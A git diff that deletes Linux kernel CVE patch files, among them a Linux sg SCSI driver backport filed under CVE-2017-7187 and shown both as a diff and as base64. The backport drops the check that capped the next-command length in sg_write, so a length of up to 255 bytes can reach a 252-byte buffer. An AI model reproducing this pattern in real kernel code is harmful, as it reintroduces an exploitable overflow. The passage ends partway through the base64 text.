- 2005 Douglas Gilbert -- * -- * Modified 19-JAN-1998 Richard Gooch Devfs support -+ * Copyright (C) 1998 - 2014 Douglas Gilbert - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by -@@ -18,11 +16,11 @@ - * - */ - --static int sg_version_num = 30534; /* 2 digits for each component */ --#define SG_VERSION_STR "3.5.34" -+static int sg_version_num = 30536; /* 2 digits for each component */ -+#define SG_VERSION_STR "3.5.36" - - /* -- * D. P. Gilbert (dgilbert@interlog.com, dougg@triode.net.au), notes: -+ * D. P. Gilbert (dgilbert@interlog.com), notes: - * - scsi logging is available via SCSI_LOG_TIMEOUT macros. First - * the kernel/module needs to be built with CONFIG_SCSI_LOGGING - * (otherwise the macros compile to empty statements). 
-@@ -64,7 +62,7 @@ - - #ifdef CONFIG_SCSI_PROC_FS - #include --static char *sg_version_date = "20061027"; -+static char *sg_version_date = "20140603"; - - static int sg_proc_init(void); - static void sg_proc_cleanup(void); -@@ -73,6 +71,12 @@ - #define SG_ALLOW_DIO_DEF 0 - - #define SG_MAX_DEVS 32768 -+ -+/* SG_MAX_CDB_SIZE should be 260 (spc4r37 section 3.1.30) however the type -+ * of sg_io_hdr::cmd_len can only represent 255. All SCSI commands greater -+ * than 16 bytes are "variable length" whose length is a multiple of 4 -+ */ -+#define SG_MAX_CDB_SIZE 252 - - /* - * Suppose you want to calculate the formula muldiv(x,m,d)=int(x * m / d) -@@ -161,7 +165,7 @@ - char low_dma; /* as in parent but possibly overridden to 1 */ - char force_packid; /* 1 -> pack_id input to read(), 0 -> ignored */ - char cmd_q; /* 1 -> allow command queuing, 0 -> don't */ -- char next_cmd_len; /* 0 -> automatic (def), >0 -> use on next write() */ -+ unsigned char next_cmd_len; /* 0: automatic, >0: use on next write() */ - char keep_orphan; /* 0 -> drop orphan (def), 1 -> keep for read() */ - char mmap_called; /* 0 -> mmap() never called on this fd */ - struct kref f_ref; -@@ -566,7 +570,7 @@ - Sg_request *srp; - struct sg_header old_hdr; - sg_io_hdr_t *hp; -- unsigned char cmnd[MAX_COMMAND_SIZE]; -+ unsigned char cmnd[SG_MAX_CDB_SIZE]; - - if (unlikely(segment_eq(get_fs(), KERNEL_DS))) - return -EINVAL; -@@ -601,12 +605,6 @@ - buf += SZ_SG_HEADER; - __get_user(opcode, buf); - if (sfp->next_cmd_len > 0) { -- if (sfp->next_cmd_len > MAX_COMMAND_SIZE) { -- SCSI_LOG_TIMEOUT(1, printk("sg_write: command length too long\n")); -- sfp->next_cmd_len = 0; -- sg_remove_request(sfp, srp); -- return -EIO; -- } - cmd_size = sfp->next_cmd_len; - sfp->next_cmd_len = 0; /* reset so only this write() effected */ - } else { -@@ -678,7 +676,7 @@ - int k; - Sg_request *srp; - sg_io_hdr_t *hp; -- unsigned char cmnd[MAX_COMMAND_SIZE]; -+ unsigned char cmnd[SG_MAX_CDB_SIZE]; - int timeout; - unsigned long 
ul_timeout; - -@@ -1648,15 +1646,27 @@ - struct request_queue *q = sfp->parentdp->device->request_queue; - struct rq_map_data *md, map_data; - int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ; -+ unsigned char *long_cmdp = NULL; - - SCSI_LOG_TIMEOUT(4, printk(KERN_INFO "sg_start_req: dxfer_len=%d\n", - dxfer_len)); - -+ if (hp->cmd_len > BLK_MAX_CDB) { -+ long_cmdp = kzalloc(hp->cmd_len, GFP_KERNEL); -+ if (!long_cmdp) -+ return -ENOMEM; -+ } -+ - rq = blk_get_request(q, rw, GFP_ATOMIC); -- if (!rq) -+ if (!rq) { -+ kfree(long_cmdp); - return -ENOMEM; -+ } - - blk_rq_set_block_pc(rq); -+ -+ if (hp->cmd_len > BLK_MAX_CDB) -+ rq->cmd = long_cmdp; - memcpy(rq->cmd, cmd, hp->cmd_len); - rq->cmd_len = hp->cmd_len; - -@@ -1741,6 +1751,8 @@ - if (srp->bio) - ret = blk_rq_unmap_user(srp->bio); - -+ if (srp->rq->cmd != srp->rq->__cmd) -+ kfree(srp->rq->cmd); - blk_put_request(srp->rq); - } - -diff --git a/include/uapi/scsi/sg.h b/include/uapi/scsi/sg.h -index a9f3c6f..d8c0c43 100644 ---- a/include/uapi/scsi/sg.h -+++ b/include/uapi/scsi/sg.h -@@ -4,77 +4,34 @@ - #include - - /* -- History: -- Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user -- process control of SCSI devices. -- Development Sponsored by Killy Corp. NY NY --Original driver (sg.h): --* Copyright (C) 1992 Lawrence Foard --Version 2 and 3 extensions to driver: --* Copyright (C) 1998 - 2006 Douglas Gilbert -- -- Version: 3.5.34 (20060920) -- This version is for 2.6 series kernels. 
-- -- For a full changelog see http://www.torque.net/sg -- --Map of SG verions to the Linux kernels in which they appear: -- ---------- ---------------------------------- -- original all kernels < 2.2.6 -- 2.1.40 2.2.20 -- 3.0.x optional version 3 sg driver for 2.2 series -- 3.1.17++ 2.4.0++ -- 3.5.30++ 2.6.0++ -- --Major new features in SG 3.x driver (cf SG 2.x drivers) -- - SG_IO ioctl() combines function if write() and read() -- - new interface (sg_io_hdr_t) but still supports old interface -- - scatter/gather in user space, direct IO, and mmap supported -- -- The normal action of this driver is to use the adapter (HBA) driver to DMA -- data into kernel buffers and then use the CPU to copy the data into the -- user space (vice versa for writes). That is called "indirect" IO due to -- the double handling of data. There are two methods offered to remove the -- redundant copy: 1) direct IO and 2) using the mmap() system call to map -- the reserve buffer (this driver has one reserve buffer per fd) into the -- user space. Both have their advantages. -- In terms of absolute speed mmap() is faster. If speed is not a concern, -- indirect IO should be fine. Read the documentation for more information. -- -- ** N.B. To use direct IO 'echo 1 > /proc/scsi/sg/allow_dio' or -- 'echo 1 > /sys/module/sg/parameters/allow_dio' is needed. -- That attribute is 0 by default. ** -- -- Historical note: this SCSI pass-through driver has been known as "sg" for -- a decade. In broader kernel discussions "sg" is used to refer to scatter -- gather techniques. The context should clarify which "sg" is referred to. -- -- Documentation -- ============= -- A web site for the SG device driver can be found at: -- http://www.torque.net/sg [alternatively check the MAINTAINERS file] -- The documentation for the sg version 3 driver can be found at: -- http://www.torque.net/sg/p/sg_v3_ho.html -- This is a rendering from DocBook source [change the extension to "sgml" -- or "xml"]. 
There are renderings in "ps", "pdf", "rtf" and "txt" (soon). -- The SG_IO ioctl is now found in other parts kernel (e.g. the block layer). -- For more information see http://www.torque.net/sg/sg_io.html -- -- The older, version 2 documents discuss the original sg interface in detail: -- http://www.torque.net/sg/p/scsi-generic.txt -- http://www.torque.net/sg/p/scsi-generic_long.txt -- Also available: /Documentation/scsi/scsi-generic.txt -- -- Utility and test programs are available at the sg web site. They are -- packaged as sg3_utils (for the lk 2.4 and 2.6 series) and sg_utils -- (for the lk 2.2 series). --*/ -+ * History: -+ * Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user -+ * process control of SCSI devices. -+ * Development Sponsored by Killy Corp. NY NY -+ * -+ * Original driver (sg.h): -+ * Copyright (C) 1992 Lawrence Foard -+ * Version 2 and 3 extensions to driver: -+ * Copyright (C) 1998 - 2014 Douglas Gilbert -+ * -+ * Version: 3.5.36 (20140603) -+ * This version is for 2.6 and 3 series kernels. -+ * -+ * Documentation -+ * ============= -+ * A web site for the SG device driver can be found at: -+ * http://sg.danny.cz/sg [alternatively check the MAINTAINERS file] -+ * The documentation for the sg version 3 driver can be found at: -+ * http://sg.danny.cz/sg/p/sg_v3_ho.html -+ * Also see: /Documentation/scsi/scsi-generic.txt -+ * -+ * For utility and test programs see: http://sg.danny.cz/sg/sg3_utils.html -+ */ - - #ifdef __KERNEL__ - extern int sg_big_buff; /* for sysctl */ - #endif - --/* New interface introduced in the 3.x SG drivers follows */ - - typedef struct sg_iovec /* same structure as used by readv() Linux system */ - { /* call. It defines one scatter-gather element. 
*/ -@@ -87,7 +44,7 @@ - { - int interface_id; /* [i] 'S' for SCSI generic (required) */ - int dxfer_direction; /* [i] data transfer direction */ -- unsigned char cmd_len; /* [i] SCSI command length ( <= 16 bytes) */ -+ unsigned char cmd_len; /* [i] SCSI command length */ - unsigned char mx_sb_len; /* [i] max length to write to sbp */ - unsigned short iovec_count; /* [i] 0 implies no scatter gather */ - unsigned int dxfer_len; /* [i] byte count of data transfer */ diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64 deleted file mode 100644 index e3b54463..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64 +++ /dev/null 
@@ -1 +0,0 @@ -RnJvbSAyYzViNDg4YjQ5ZDkyYzAyYWMyOGY0NWU2OGYzNjZjNmE1MWE4OTQ5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBEb3VnbGFzIEdpbGJlcnQgPGRnaWxiZXJ0QGludGVybG9nLmNvbT4KRGF0ZTogVHVlLCAwMyBKdW4gMjAxNCAxMzoxODoxOCAtMDQwMApTdWJqZWN0OiBbUEFUQ0hdIEJBQ0tQT1JUOiBzZzogcmVsYXggMTYgYnl0ZSBjZGIgcmVzdHJpY3Rpb24KCiAtIHJlbW92ZSB0aGUgMTYgYnl0ZSBDREIgKFNDU0kgY29tbWFuZCkgbGVuZ3RoIGxpbWl0IGZyb20gdGhlIHNnIGRyaXZlcgogICBieSBoYW5kbGluZyBsb25nZXIgQ0RCcyB0aGUgc2FtZSB3YXkgYXMgdGhlIGJzZyBkcml2ZXIuIFJlbW92ZSBjb21tZW50CiAgIGZyb20gc2cuaCBwdWJsaWMgaW50ZXJmYWNlIGFib3V0IHRoZSBjbWRfbGVuIGZpZWxkIGJlaW5nIGxpbWl0ZWQgdG8gMTYKICAgYnl0ZXMuCiAtIHJlbW92ZSBzb21lIGRlYWQgY29kZSBjYXVzZWQgYnkgdGhpcyBjaGFuZ2UKIC0gY2xlYW51cCBjb21tZW50IGJsb2NrIGF0IHRoZSB0b3Agb2Ygc2cuaCwgZml4IHVybHMKCkNoYW5nZS1JZDogSWU4MTUwZTUzNzViMzMxNmQ1ZDUyMDZmMDc5YzRhNTBmMWM1MGI3NTUKU2lnbmVkLW9mZi1ieTogRG91Z2xhcyBHaWxiZXJ0IDxkZ2lsYmVydEBpbnRlcmxvZy5jb20+ClJldmlld2VkLWJ5OiBNaWtlIENocmlzdGllIDxtaWNoYWVsY0Bjcy53aXNjLmVkdT4KUmV2aWV3ZWQtYnk6IEhhbm5lcyBSZWluZWNrZSA8aGFyZUBzdXNlLmRlPgpTaWduZWQtb2ZmLWJ5OiBDaHJpc3RvcGggSGVsbHdpZyA8aGNoQGxzdC5kZT4KLS0tCgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCA1MTcwNTA2Li45NmQ2MzVlIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtNyw5ICs3LDcgQEAKICAqIE9yaWdpbmFsIGRyaXZlciAoc2cuYyk6CiAgKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTkyIExhd3JlbmNlIEZvYXJkCiAgKiBWZXJzaW9uIDIgYW5kIDMgZXh0ZW5zaW9ucyB0byBkcml2ZXI6Ci0gKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAwNSBEb3VnbGFzIEdpbGJlcnQKLSAqCi0gKiAgTW9kaWZpZWQgIDE5LUpBTi0xOTk4ICBSaWNoYXJkIEdvb2NoIDxyZ29vY2hAYXRuZi5jc2lyby5hdT4gIERldmZzIHN1cHBvcnQKKyAqICAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTggLSAyMDE0IERvdWdsYXMgR2lsYmVydAogICoKICAqIFRoaXMgcHJvZ3JhbSBpcyBmcmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCBhbmQvb3IgbW9kaWZ5CiAgKiBpdCB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGFzIHB1Ymxpc2hlZCBieQpAQCAtMTgsMTEgKzE2LDExIEBACiAgKgogICovCiAKLXN0YXRpYyBpbnQgc2dfdmVyc2lvbl9udW0gPSAzMDUzNDsJLyogMiBkaWdpdHMgZm9yIGVhY
2ggY29tcG9uZW50ICovCi0jZGVmaW5lIFNHX1ZFUlNJT05fU1RSICIzLjUuMzQiCitzdGF0aWMgaW50IHNnX3ZlcnNpb25fbnVtID0gMzA1MzY7CS8qIDIgZGlnaXRzIGZvciBlYWNoIGNvbXBvbmVudCAqLworI2RlZmluZSBTR19WRVJTSU9OX1NUUiAiMy41LjM2IgogCiAvKgotICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSwgZG91Z2dAdHJpb2RlLm5ldC5hdSksIG5vdGVzOgorICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSksIG5vdGVzOgogICogICAgICAtIHNjc2kgbG9nZ2luZyBpcyBhdmFpbGFibGUgdmlhIFNDU0lfTE9HX1RJTUVPVVQgbWFjcm9zLiBGaXJzdAogICogICAgICAgIHRoZSBrZXJuZWwvbW9kdWxlIG5lZWRzIHRvIGJlIGJ1aWx0IHdpdGggQ09ORklHX1NDU0lfTE9HR0lORwogICogICAgICAgIChvdGhlcndpc2UgdGhlIG1hY3JvcyBjb21waWxlIHRvIGVtcHR5IHN0YXRlbWVudHMpLgpAQCAtNjQsNyArNjIsNyBAQAogCiAjaWZkZWYgQ09ORklHX1NDU0lfUFJPQ19GUwogI2luY2x1ZGUgPGxpbnV4L3Byb2NfZnMuaD4KLXN0YXRpYyBjaGFyICpzZ192ZXJzaW9uX2RhdGUgPSAiMjAwNjEwMjciOworc3RhdGljIGNoYXIgKnNnX3ZlcnNpb25fZGF0ZSA9ICIyMDE0MDYwMyI7CiAKIHN0YXRpYyBpbnQgc2dfcHJvY19pbml0KHZvaWQpOwogc3RhdGljIHZvaWQgc2dfcHJvY19jbGVhbnVwKHZvaWQpOwpAQCAtNzMsNiArNzEsMTIgQEAKICNkZWZpbmUgU0dfQUxMT1dfRElPX0RFRiAwCiAKICNkZWZpbmUgU0dfTUFYX0RFVlMgMzI3NjgKKworLyogU0dfTUFYX0NEQl9TSVpFIHNob3VsZCBiZSAyNjAgKHNwYzRyMzcgc2VjdGlvbiAzLjEuMzApIGhvd2V2ZXIgdGhlIHR5cGUKKyAqIG9mIHNnX2lvX2hkcjo6Y21kX2xlbiBjYW4gb25seSByZXByZXNlbnQgMjU1LiBBbGwgU0NTSSBjb21tYW5kcyBncmVhdGVyCisgKiB0aGFuIDE2IGJ5dGVzIGFyZSAidmFyaWFibGUgbGVuZ3RoIiB3aG9zZSBsZW5ndGggaXMgYSBtdWx0aXBsZSBvZiA0CisgKi8KKyNkZWZpbmUgU0dfTUFYX0NEQl9TSVpFIDI1MgogCiAvKgogICogU3VwcG9zZSB5b3Ugd2FudCB0byBjYWxjdWxhdGUgdGhlIGZvcm11bGEgbXVsZGl2KHgsbSxkKT1pbnQoeCAqIG0gLyBkKQpAQCAtMTYxLDcgKzE2NSw3IEBACiAJY2hhciBsb3dfZG1hOwkJLyogYXMgaW4gcGFyZW50IGJ1dCBwb3NzaWJseSBvdmVycmlkZGVuIHRvIDEgKi8KIAljaGFyIGZvcmNlX3BhY2tpZDsJLyogMSAtPiBwYWNrX2lkIGlucHV0IHRvIHJlYWQoKSwgMCAtPiBpZ25vcmVkICovCiAJY2hhciBjbWRfcTsJCS8qIDEgLT4gYWxsb3cgY29tbWFuZCBxdWV1aW5nLCAwIC0+IGRvbid0ICovCi0JY2hhciBuZXh0X2NtZF9sZW47CS8qIDAgLT4gYXV0b21hdGljIChkZWYpLCA+MCAtPiB1c2Ugb24gbmV4dCB3cml0ZSgpICovCisJdW5zaWduZWQgY2hhciBuZXh0X2NtZF9sZW47IC8qIDA6IGF1dG9tYXRpYywgPjA6IHVzZSBvbiBuZXh0IHdyaXRlKCkgK
i8KIAljaGFyIGtlZXBfb3JwaGFuOwkvKiAwIC0+IGRyb3Agb3JwaGFuIChkZWYpLCAxIC0+IGtlZXAgZm9yIHJlYWQoKSAqLwogCWNoYXIgbW1hcF9jYWxsZWQ7CS8qIDAgLT4gbW1hcCgpIG5ldmVyIGNhbGxlZCBvbiB0aGlzIGZkICovCiAJc3RydWN0IGtyZWYgZl9yZWY7CkBAIC01NjYsNyArNTcwLDcgQEAKIAlTZ19yZXF1ZXN0ICpzcnA7CiAJc3RydWN0IHNnX2hlYWRlciBvbGRfaGRyOwogCXNnX2lvX2hkcl90ICpocDsKLQl1bnNpZ25lZCBjaGFyIGNtbmRbTUFYX0NPTU1BTkRfU0laRV07CisJdW5zaWduZWQgY2hhciBjbW5kW1NHX01BWF9DREJfU0laRV07CiAKIAlpZiAodW5saWtlbHkoc2VnbWVudF9lcShnZXRfZnMoKSwgS0VSTkVMX0RTKSkpCiAJCXJldHVybiAtRUlOVkFMOwpAQCAtNjAxLDEyICs2MDUsNiBAQAogCWJ1ZiArPSBTWl9TR19IRUFERVI7CiAJX19nZXRfdXNlcihvcGNvZGUsIGJ1Zik7CiAJaWYgKHNmcC0+bmV4dF9jbWRfbGVuID4gMCkgewotCQlpZiAoc2ZwLT5uZXh0X2NtZF9sZW4gPiBNQVhfQ09NTUFORF9TSVpFKSB7Ci0JCQlTQ1NJX0xPR19USU1FT1VUKDEsIHByaW50aygic2dfd3JpdGU6IGNvbW1hbmQgbGVuZ3RoIHRvbyBsb25nXG4iKSk7Ci0JCQlzZnAtPm5leHRfY21kX2xlbiA9IDA7Ci0JCQlzZ19yZW1vdmVfcmVxdWVzdChzZnAsIHNycCk7Ci0JCQlyZXR1cm4gLUVJTzsKLQkJfQogCQljbWRfc2l6ZSA9IHNmcC0+bmV4dF9jbWRfbGVuOwogCQlzZnAtPm5leHRfY21kX2xlbiA9IDA7CS8qIHJlc2V0IHNvIG9ubHkgdGhpcyB3cml0ZSgpIGVmZmVjdGVkICovCiAJfSBlbHNlIHsKQEAgLTY3OCw3ICs2NzYsNyBAQAogCWludCBrOwogCVNnX3JlcXVlc3QgKnNycDsKIAlzZ19pb19oZHJfdCAqaHA7Ci0JdW5zaWduZWQgY2hhciBjbW5kW01BWF9DT01NQU5EX1NJWkVdOworCXVuc2lnbmVkIGNoYXIgY21uZFtTR19NQVhfQ0RCX1NJWkVdOwogCWludCB0aW1lb3V0OwogCXVuc2lnbmVkIGxvbmcgdWxfdGltZW91dDsKIApAQCAtMTY0OCwxNSArMTY0NiwyNyBAQAogCXN0cnVjdCByZXF1ZXN0X3F1ZXVlICpxID0gc2ZwLT5wYXJlbnRkcC0+ZGV2aWNlLT5yZXF1ZXN0X3F1ZXVlOwogCXN0cnVjdCBycV9tYXBfZGF0YSAqbWQsIG1hcF9kYXRhOwogCWludCBydyA9IGhwLT5keGZlcl9kaXJlY3Rpb24gPT0gU0dfRFhGRVJfVE9fREVWID8gV1JJVEUgOiBSRUFEOworCXVuc2lnbmVkIGNoYXIgKmxvbmdfY21kcCA9IE5VTEw7CiAKIAlTQ1NJX0xPR19USU1FT1VUKDQsIHByaW50ayhLRVJOX0lORk8gInNnX3N0YXJ0X3JlcTogZHhmZXJfbGVuPSVkXG4iLAogCQkJCSAgIGR4ZmVyX2xlbikpOwogCisJaWYgKGhwLT5jbWRfbGVuID4gQkxLX01BWF9DREIpIHsKKwkJbG9uZ19jbWRwID0ga3phbGxvYyhocC0+Y21kX2xlbiwgR0ZQX0tFUk5FTCk7CisJCWlmICghbG9uZ19jbWRwKQorCQkJcmV0dXJuIC1FTk9NRU07CisJfQorCiAJcnEgPSBibGtfZ2V0X3JlcXVlc3QocSwgcncsIEdGUF9BVE9NSUMpOwotCWlmICghc
nEpCisJaWYgKCFycSkgeworCQlrZnJlZShsb25nX2NtZHApOwogCQlyZXR1cm4gLUVOT01FTTsKKwl9CiAKIAlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKKworCWlmIChocC0+Y21kX2xlbiA+IEJMS19NQVhfQ0RCKQorCQlycS0+Y21kID0gbG9uZ19jbWRwOwogCW1lbWNweShycS0+Y21kLCBjbWQsIGhwLT5jbWRfbGVuKTsKIAlycS0+Y21kX2xlbiA9IGhwLT5jbWRfbGVuOwogCkBAIC0xNzQxLDYgKzE3NTEsOCBAQAogCQlpZiAoc3JwLT5iaW8pCiAJCQlyZXQgPSBibGtfcnFfdW5tYXBfdXNlcihzcnAtPmJpbyk7CiAKKwkJaWYgKHNycC0+cnEtPmNtZCAhPSBzcnAtPnJxLT5fX2NtZCkKKwkJCWtmcmVlKHNycC0+cnEtPmNtZCk7CiAJCWJsa19wdXRfcmVxdWVzdChzcnAtPnJxKTsKIAl9CiAKZGlmZiAtLWdpdCBhL2luY2x1ZGUvdWFwaS9zY3NpL3NnLmggYi9pbmNsdWRlL3VhcGkvc2NzaS9zZy5oCmluZGV4IGE5ZjNjNmYuLmQ4YzBjNDMgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvdWFwaS9zY3NpL3NnLmgKKysrIGIvaW5jbHVkZS91YXBpL3Njc2kvc2cuaApAQCAtNCw3NyArNCwzNCBAQAogI2luY2x1ZGUgPGxpbnV4L2NvbXBpbGVyLmg+CiAKIC8qCi0gICBIaXN0b3J5OgotICAgIFN0YXJ0ZWQ6IEF1ZyA5IGJ5IExhd3JlbmNlIEZvYXJkIChlbnRyb3B5QHdvcmxkLnN0ZC5jb20pLCB0byBhbGxvdyB1c2VyCi0gICAgIHByb2Nlc3MgY29udHJvbCBvZiBTQ1NJIGRldmljZXMuCi0gICAgRGV2ZWxvcG1lbnQgU3BvbnNvcmVkIGJ5IEtpbGx5IENvcnAuIE5ZIE5ZCi1PcmlnaW5hbCBkcml2ZXIgKHNnLmgpOgotKiAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTIgTGF3cmVuY2UgRm9hcmQKLVZlcnNpb24gMiBhbmQgMyBleHRlbnNpb25zIHRvIGRyaXZlcjoKLSogICAgICAgQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAwNiBEb3VnbGFzIEdpbGJlcnQKLQotICAgIFZlcnNpb246IDMuNS4zNCAoMjAwNjA5MjApCi0gICAgVGhpcyB2ZXJzaW9uIGlzIGZvciAyLjYgc2VyaWVzIGtlcm5lbHMuCi0KLSAgICBGb3IgYSBmdWxsIGNoYW5nZWxvZyBzZWUgaHR0cDovL3d3dy50b3JxdWUubmV0L3NnCi0KLU1hcCBvZiBTRyB2ZXJpb25zIHRvIHRoZSBMaW51eCBrZXJuZWxzIGluIHdoaWNoIHRoZXkgYXBwZWFyOgotICAgICAgIC0tLS0tLS0tLS0gICAgICAgIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLSAgICAgICBvcmlnaW5hbCAgICAgICAgICBhbGwga2VybmVscyA8IDIuMi42Ci0gICAgICAgMi4xLjQwICAgICAgICAgICAgMi4yLjIwCi0gICAgICAgMy4wLnggICAgICAgICAgICAgb3B0aW9uYWwgdmVyc2lvbiAzIHNnIGRyaXZlciBmb3IgMi4yIHNlcmllcwotICAgICAgIDMuMS4xNysrICAgICAgICAgIDIuNC4wKysKLSAgICAgICAzLjUuMzArKyAgICAgICAgICAyLjYuMCsrCi0KLU1ham9yIG5ldyBmZWF0dXJlcyBpbiBTRyAzLnggZHJpdmVyIChjZiBTRyAyLnggZHJpdmVycykKLQktIFNHX0lPIGlvY3RsKCkgY29tYmluZXMgZnVuY
3Rpb24gaWYgd3JpdGUoKSBhbmQgcmVhZCgpCi0JLSBuZXcgaW50ZXJmYWNlIChzZ19pb19oZHJfdCkgYnV0IHN0aWxsIHN1cHBvcnRzIG9sZCBpbnRlcmZhY2UKLQktIHNjYXR0ZXIvZ2F0aGVyIGluIHVzZXIgc3BhY2UsIGRpcmVjdCBJTywgYW5kIG1tYXAgc3VwcG9ydGVkCi0KLSBUaGUgbm9ybWFsIGFjdGlvbiBvZiB0aGlzIGRyaXZlciBpcyB0byB1c2UgdGhlIGFkYXB0ZXIgKEhCQSkgZHJpdmVyIHRvIERNQQotIGRhdGEgaW50byBrZXJuZWwgYnVmZmVycyBhbmQgdGhlbiB1c2UgdGhlIENQVSB0byBjb3B5IHRoZSBkYXRhIGludG8gdGhlIAotIHVzZXIgc3BhY2UgKHZpY2UgdmVyc2EgZm9yIHdyaXRlcykuIFRoYXQgaXMgY2FsbGVkICJpbmRpcmVjdCIgSU8gZHVlIHRvIAotIHRoZSBkb3VibGUgaGFuZGxpbmcgb2YgZGF0YS4gVGhlcmUgYXJlIHR3byBtZXRob2RzIG9mZmVyZWQgdG8gcmVtb3ZlIHRoZQotIHJlZHVuZGFudCBjb3B5OiAxKSBkaXJlY3QgSU8gYW5kIDIpIHVzaW5nIHRoZSBtbWFwKCkgc3lzdGVtIGNhbGwgdG8gbWFwCi0gdGhlIHJlc2VydmUgYnVmZmVyICh0aGlzIGRyaXZlciBoYXMgb25lIHJlc2VydmUgYnVmZmVyIHBlciBmZCkgaW50byB0aGUKLSB1c2VyIHNwYWNlLiBCb3RoIGhhdmUgdGhlaXIgYWR2YW50YWdlcy4KLSBJbiB0ZXJtcyBvZiBhYnNvbHV0ZSBzcGVlZCBtbWFwKCkgaXMgZmFzdGVyLiBJZiBzcGVlZCBpcyBub3QgYSBjb25jZXJuLCAKLSBpbmRpcmVjdCBJTyBzaG91bGQgYmUgZmluZS4gUmVhZCB0aGUgZG9jdW1lbnRhdGlvbiBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KLQotICoqIE4uQi4gVG8gdXNlIGRpcmVjdCBJTyAnZWNobyAxID4gL3Byb2Mvc2NzaS9zZy9hbGxvd19kaW8nIG9yCi0gICAgICAgICAnZWNobyAxID4gL3N5cy9tb2R1bGUvc2cvcGFyYW1ldGVycy9hbGxvd19kaW8nIGlzIG5lZWRlZC4KLSAgICAgICAgIFRoYXQgYXR0cmlidXRlIGlzIDAgYnkgZGVmYXVsdC4gKioKLSAKLSBIaXN0b3JpY2FsIG5vdGU6IHRoaXMgU0NTSSBwYXNzLXRocm91Z2ggZHJpdmVyIGhhcyBiZWVuIGtub3duIGFzICJzZyIgZm9yIAotIGEgZGVjYWRlLiBJbiBicm9hZGVyIGtlcm5lbCBkaXNjdXNzaW9ucyAic2ciIGlzIHVzZWQgdG8gcmVmZXIgdG8gc2NhdHRlcgotIGdhdGhlciB0ZWNobmlxdWVzLiBUaGUgY29udGV4dCBzaG91bGQgY2xhcmlmeSB3aGljaCAic2ciIGlzIHJlZmVycmVkIHRvLgotCi0gRG9jdW1lbnRhdGlvbgotID09PT09PT09PT09PT0KLSBBIHdlYiBzaXRlIGZvciB0aGUgU0cgZGV2aWNlIGRyaXZlciBjYW4gYmUgZm91bmQgYXQ6Ci0JaHR0cDovL3d3dy50b3JxdWUubmV0L3NnICBbYWx0ZXJuYXRpdmVseSBjaGVjayB0aGUgTUFJTlRBSU5FUlMgZmlsZV0KLSBUaGUgZG9jdW1lbnRhdGlvbiBmb3IgdGhlIHNnIHZlcnNpb24gMyBkcml2ZXIgY2FuIGJlIGZvdW5kIGF0OgotIAlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cvcC9zZ192M19oby5odG1sCi0gVGhpcyBpcyBhIHJlbmRlcmluZ
yBmcm9tIERvY0Jvb2sgc291cmNlIFtjaGFuZ2UgdGhlIGV4dGVuc2lvbiB0byAic2dtbCIKLSBvciAieG1sIl0uIFRoZXJlIGFyZSByZW5kZXJpbmdzIGluICJwcyIsICJwZGYiLCAicnRmIiBhbmQgInR4dCIgKHNvb24pLgotIFRoZSBTR19JTyBpb2N0bCBpcyBub3cgZm91bmQgaW4gb3RoZXIgcGFydHMga2VybmVsIChlLmcuIHRoZSBibG9jayBsYXllcikuCi0gRm9yIG1vcmUgaW5mb3JtYXRpb24gc2VlIGh0dHA6Ly93d3cudG9ycXVlLm5ldC9zZy9zZ19pby5odG1sCi0KLSBUaGUgb2xkZXIsIHZlcnNpb24gMiBkb2N1bWVudHMgZGlzY3VzcyB0aGUgb3JpZ2luYWwgc2cgaW50ZXJmYWNlIGluIGRldGFpbDoKLQlodHRwOi8vd3d3LnRvcnF1ZS5uZXQvc2cvcC9zY3NpLWdlbmVyaWMudHh0Ci0JaHR0cDovL3d3dy50b3JxdWUubmV0L3NnL3Avc2NzaS1nZW5lcmljX2xvbmcudHh0Ci0gQWxzbyBhdmFpbGFibGU6IDxrZXJuZWxfc291cmNlPi9Eb2N1bWVudGF0aW9uL3Njc2kvc2NzaS1nZW5lcmljLnR4dAotCi0gVXRpbGl0eSBhbmQgdGVzdCBwcm9ncmFtcyBhcmUgYXZhaWxhYmxlIGF0IHRoZSBzZyB3ZWIgc2l0ZS4gVGhleSBhcmUgCi0gcGFja2FnZWQgYXMgc2czX3V0aWxzIChmb3IgdGhlIGxrIDIuNCBhbmQgMi42IHNlcmllcykgYW5kIHNnX3V0aWxzCi0gKGZvciB0aGUgbGsgMi4yIHNlcmllcykuCi0qLworICogSGlzdG9yeToKKyAqICBTdGFydGVkOiBBdWcgOSBieSBMYXdyZW5jZSBGb2FyZCAoZW50cm9weUB3b3JsZC5zdGQuY29tKSwgdG8gYWxsb3cgdXNlcgorICogICBwcm9jZXNzIGNvbnRyb2wgb2YgU0NTSSBkZXZpY2VzLgorICogIERldmVsb3BtZW50IFNwb25zb3JlZCBieSBLaWxseSBDb3JwLiBOWSBOWQorICoKKyAqIE9yaWdpbmFsIGRyaXZlciAoc2cuaCk6CisgKiAgICAgICBDb3B